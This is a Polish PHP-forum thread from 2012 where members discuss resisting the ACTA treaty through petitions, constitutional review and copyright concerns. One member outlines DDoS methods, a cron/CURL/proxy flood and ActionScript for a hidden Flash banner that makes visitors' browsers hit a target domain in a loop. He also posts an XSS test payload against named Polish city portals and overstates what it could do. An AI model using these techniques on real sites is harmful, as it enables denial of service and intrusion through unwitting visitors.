Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Pomysł na motywację do walki z ACTA
Forum PHP.pl > Inne > Hydepark
mlawnik
Witam,

tylko taki szybki pomysł, sam nie wykonam, bo nie jestem w stanie (za mały skill w grafice/programowaniu):

Idea:

Licznik odliczający czas do planowanego podpisania ACTA przez Polskę i do tego pod spodem wybór prędkości łącza.
Pokazywałaby się informacja, ile przy ciągłym ściąganiu plików bylibyśmy jeszcze w stanie ściągnąć w wolnym internecie.

Taka prosta stronka.

Jak ktoś się podejmie/gdzieś opublikuje, to proszę dać znać.

Pozdrawiam,
mlawnik

PS. Jak trzeba coś doprecyzować, to proszę pisać.
Niktoś
No chyba ,że się komuś nudzi.Ja już bym wolał stronkę o charakterze inicjatywy społecznej,gdzie można poprzeć ustawę o nie przystępowaniu do ACTA.Po zebraniu odpowiedniej liczby głosów,lądowałaby w gabinecie Rady Ministrów jako projekt ustawy z inicjatywy społecznej i zgodnie z konstytucją RP musiałaby zostać rozpatrzona.Przynajmniej miałoby to jakiś cel.
mlawnik
Racja.

Ale jeśli się nie mylę to te podpisy muszą być "na żywo". Ale myślę, że cztery godziny w centrum dużego miasta i już mamy załatwione.

Pozdro,
mlawnik
Niktoś
W formie elektronicznej też można to nie średniowiecze, żeby nie było można.Dane tylko trzeba dobrze zabezpieczyć bo wymagałoby to peselu i numeru dowodu.
Posio
Zebranie podpisów w każdym z większych miast nie jest żadnym problemem. Jest wielu młodych myślących o przyszłości ludzi którzy są przeciwko inwigilacji w internecie.

Uważam że zapowiedzi ministrów "to nie atak, to zainteresowanie sprawą" mają na celu tylko zmniejszenie hałasu związanego z ACTA. Co do stronki w 1rwszym poscie super pomysł. Prosty licznik dobre proste.

Jeśli to zajdzie za daleko nastąpią ataki na bardziej "wartościowe" strony niż premiera czy prezydenta.

STOP ACTA!

cojack
moja strona cojack.pl padła ofiarą acta ;(
fiasko
To są przykładowe metody ataków jakie stosują ci hakerzy smile.gif

Można np. wykorzystać potęgę swoich serwerów + CURL + proxy dać w cron dobijając serwer przeciwnika.
Skrypt non stop pobiera dane przez tysiące różnych IP i jest nie do zablokowania.

Generuje spore obciążenie smile.gif

Można też zrobić baner we flash i zamieścić na swojej stronie smile.gif

kod do banera w actionscript
Kod
var plikPHP:URLRequest = new URLRequest("http://www.domena-której-nie-lubimy.pl);
var loader:URLLoader = new URLLoader();
//jeśli wczytano plik, uruchom funkcje wczytanoPlikPHP()
loader.addEventListener(Event.COMPLETE, wczytanoPlikPHP);
loader.load(plikPHP);
pole_slogan.text = "test";
//funkcja pobiera zmienne z URLVariables i wyświetla je w polu tekstowym pole_txt
function wczytanoPlikPHP(e:Event):void {
        var dane:URLVariables = new URLVariables(loader.data);

pole_slogan.htmlText = dane.zmienna1;

}

Baner roi się na białym tle w niewielkim rozmiarze z animacją w pętli. Baner bezprzerwowy pobiera dane z jakiegoś adresu url do póki użytkownik nie zamknie twojej strony. Wszystko jest nie widoczne dla użytkownika.

Jeśli ktoś odwiedzi twoją stronę to wywołanie idzie z przeglądarki użytkowania do tej strony której się nie lubi w pętli np. co 1 sek. nie ma szans żeby nie zabiło serwera smile.gif

peter13135
Cytat(cojack @ 23.01.2012, 12:37:25 ) *
moja strona cojack.pl padła ofiarą acta ;(

Przez acta, czy to anonumous ? Bo już się lekko gubię tongue.gif
fiasko
To trzeba było się lepiej zabezpieczyć smile.gif

Widzieliście, że stronach poznan.pl , gdansk.pl, jest dziura ?

Włamać się można przez formularz wyszukiwania test na podatność ataku xss. Wystarczy wpisać w formularz wyszukiwania i enter. Nie filtrują zmiennych smile.gif hehe co za głąby.

Przez tą dziurę można skasować cały portal.

[JAVASCRIPT] pobierz, plaintext
  1. "><script>alert(/XSS/)</script>
[JAVASCRIPT] pobierz, plaintext

IceManSpy
Nie chcę zakładać nowego tematu, ale zastanawiam się nad jedna "dziurą" w całym ACTA. Problem polega na tym, że nie można ściągać rzeczy zamieszczonych, czy udostępniać ich?

Jeśli ściągać, to co się stanie jak złapię wirusa, który będzie z jakiegoś zdalnego serwera pobierał do mnie pliki? Będzie to widoczne, że ja coś pobieram, chociaż jestem tego nieświadomy.
Niktoś
Z tą actą to dobrze nie będzie.Po cichu ją robili-nikt nic nie wie tylko wąska grupka polityków.
Mając podobny obrazek zamieszczony na stronie,czy zgodnie z acta będzie to podróbka,albo ja mogę podać ,że to On ma podróbkę.Normalnie spowoduje to fale pozwań do sądów i się z tego cyrk na gnojnej zrobi.Jakiś "Osioł" podpiął cały projekt pod usługi internetowe,jak to całkiem odrębna jedyna w swoim rodzaju dziedzina.Najlepsze jest to ,że traktat Acta podpisywali"dziadkowie" dla których internet to jeszcze czarna magia i całkowite zło ,które trzeba wyeliminować.
Wypowiedź jednego z nich nie dosłowna:"Trzeba przystąpić do paktu acta, by nie miało miejsca ,że po 15 minutach od wydania gazety ,artykuł pojawia się w internecie, przez co spada sprzedaż gazet".
No wybaczcie ,po takiej wypowiedzi ręce mi opadają.Po pierwsze większość gazet same ,wypuszczają artykuły w formie elektronicznej.
Po drugie przykładowo,gazety,e-faktury, e-rachunki,e-przelewy powodują spadek zużycia drewna,miej lasów jest wycinanych ,tak więc można powiedzieć ,że internet jest pro ekologiczny.
I teraz wytłumacz to takiemu Panu, który jeszcze żyje w epoce papirusu,i najgorsze że tacy zatwierdzają takie poważne traktaty.

Druga sprawa-jak będą regulowane licencje typu freeware,open-source i inne licencje-przecież one regulują teraz rynek internetowy,co będzie jak wejdzie ACTA-za dużo niewiadomych.Czego nie chcą podać pełnej wersji paktu w internecie,tylko jakieś strzępki wyrwane z kontekstu.To jest dziwne.
thek
Ja na di.com się trochę rozpisuję, bo są tam typowi "klakierzy", co to piszą same pochwały i jak to będzie dobrze. Tam między innymi zawarłem to o czym wspomniał IceManSpy. ACTA nie precyzuje dokładnie wszystkiego. Ze swojej strony mówi, że użytkownik ma być świadomy popełniania przestępstwa, ale nie jest to nigdzie napisane jednoznacznie i to sprawia, że kwestia interpretacji jest niejednoznaczna. Zwłaszcza ważne jest tu zerknięcie do Artykułu 9 i 25, które właśnie tego przypadku mogą tyczyć.
IceManSpy
Jeszcze jest jeden haczyk. Jeśli na YT będzie np teledysk z muzyką, to mogę wykorzystać oprogramowanie, które nagra mi do pliku MP3 to co znajduje się na wyjściu na głośniki. Czy w takim razie jest to przestępstwo? Czy ja kradnę czyjąś własność intelektualną, skoro ona jest wszem i wobec dostępna?
A jeśli pójdę do galerii, czy inne miejsce publiczne w którym jest dostęp do internetu i pobiorę nielegalne pliki, to co się stanie? Kto jest winny? Właściciel np kawiarni czy knajpki?

To tylko przykłady, ale może warto je także wyjaśnić.

Myślę, że większość osób nie wie o co chodzi w ACTA i nikt z polityków nie potrafi tego wytłumaczyć.
zordon
Skoro ACTA jest ponoć niezgodna z konstytucją to może niech większe portale, które na tym najbardziej ucierpią (joemonster, wykop, demotywatory itp) niech się zjednoczą, złożą na jakiegoś prawnika i zaskarżą to gó.no. Zanim oczywiście zmienią konstytucję smile.gif
thek
Problem jest w tym, że ACTA jest umową międzynarodową, a ta ma specyficzną wykładnię. Warto zajrzeć do artykułów od 89 do 91, włącznie, Konstytucji RP. W skrócie można to okreslić jako:
Cytat
Ratyfikowane umowy międzynarodowe są źródłem powszechnie obowiązującego prawa. W konstytucyjnym porządku prawnym usytuowane są poniżej Konstytucji, z którą powinny być zgodne. Do orzekania o ich zgodności z ustawą zasadniczą upoważniony został TK, który czyni to na ogólnych zasadach przewidzianych dla kontroli następczej oraz na wniosek Prezydenta skierowany przed ratyfikacją (kontrola wstępna). Skuteczność umów międzynarodowych względem pozostałych aktów uzależniona jest od trybu ratyfikacji.

Umowy międzynarodowe, które są ratyfikowane przez prezydenta za uprzednią zgodą parlamentu wyrażoną w ustawie i które są ogłaszane w trybie wymaganym dla ustaw, mają moc prawną ustawy. Jednakże w przypadku, "jeżeli ustawy nie da się pogodzić z umową", umowa ta, w myśl przepisów art. 91 ust.2- ma pierwszeństwo przed ustawą. Natomiast umowy ratyfikowane bez upoważnienia ustawy, w przypadku kolizji norm ustępują swą skutecznością ustawie, ale mają pierwszeństwo przed innymi aktami prawnymi.

Gdyby się więc wnerwić to zjeb powinien mieć Komorowski bo MÓGŁ tę ustawę do TK zgłosić już w celu zbadania jej zgodności z Konstytucją jeszcze przed podpisaniem i MA czas ciągle przed ratyfikacją. Jeśli tego NIE zrobi ani on ani TK to wiadomo kogo na taczkach z Warszawy wywieźć wink.gif
Niktoś
Czyli wszystko w rękach prezydenta.Jak ratyfikuje ,to straci duuuuuuuuuużo wyborców.
Niktoś
Słucham ,premier podpisał,partia straci rzeszę młodych wyborców.
zordon
w sumie to po co im ta acta:
http://www.rmf24.pl/raport-koniec-wolnego-...arne,nId,431236
Niktoś
Z ludzi Idiotów robią,że niby wszystko ładnie ,to po co usuwają takie komentarze.W gówno się pakują Ignoranci.Normalnie jaja sobie z Polaków robią.Ile portali pójdzie sie rypać,tego chyba nikt nie zliczy.Ile ludzi może stracić pracę w branży IT?Czy to nie zamrozi tak szybko rozwijającego się rynku internetowego.Freelancing przestanie istnieć.
Czy Oni umią myśleć?Niby teraz usługodawca będzie obciążony filtracją niby "podrobionymi" plikami,czy przez to nie wzrośnie koszt usług internetowych, które i tak są jednymi z najdroższych w europie??
Ech ja na nich na pewno głosować nie będę.
fiasko
Dokładnie !

ACTA mocno uderzy w branżę developerską dlatego, że ludzie przestaną inwestować w strony ze względu na zbyt duży czynnik ryzyka. Po za tym już teraz doszło do sytuacji w której na wniosek USA pewien 23 letni Brytyjczyk , który zamieszał na swojej stronie linki do plików może mieć deportację do USA. Sąd zdecydował, że mimo że w Wielkiej Brytanii to nie jest to przestępstwo to załamał on przepisy innego kraju. W USA grozi mu 10 LAT.

Pytanie co będzie gdy zajmując się pozycjonowaniem umieszczę link do strony klienta którą pozycjonuję ? Następnie ktoś tam zamieści nielegalne treści. Czy wtedy mam przed sobą perspektywę 10 lat PAKI w USA ? Przecież w dużych serwisach nikt nie sprawdza dokąt prowadza linki i nikt nie jest w stanie sprawdzić treści pod tymi linkami.

Po za tym rynek małych telewizji i sieci kablowych dostanie po tyłku, dlatego, że ACTA nakazuje filtrowanie treści. Kogo stać na filtorwnaie treści ? Czy to jest w ogóle możliwe ? Wątpię. Ale odpowiedzialność ponosi provider i ceny internetu mogą skoczyć do góry.

W czyim interesie działa TUSK ? No na pewno nie w interesie Polski i Polaków. Mogę śmiało go nazwać zdrajcą.

thek
Tak wpisując się w sprawę ACTA przeróbka reklamy w 2 wersjach:
http://www.youtube.com/watch?v=K_B2p_EOh_M
http://www.youtube.com/watch?v=Vrmgzd21iKE
Necsord
A propos ciekawych linków / artykułów ( których ostatnio jest dość dużo ) na ten temat:
http://www.avaaz.org/en/eu_save_the_internet/
http://tech.wp.pl/kat,1009785,title,Studen...ml?ticaid=1dd27
http://vanhus.naamapalmu.fi/files/o8/mediu...onZoXDzt9x.jpeg
http://jestemprzeciwacta.pl/ - bodajże najliczniejsza obecnie petycja.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.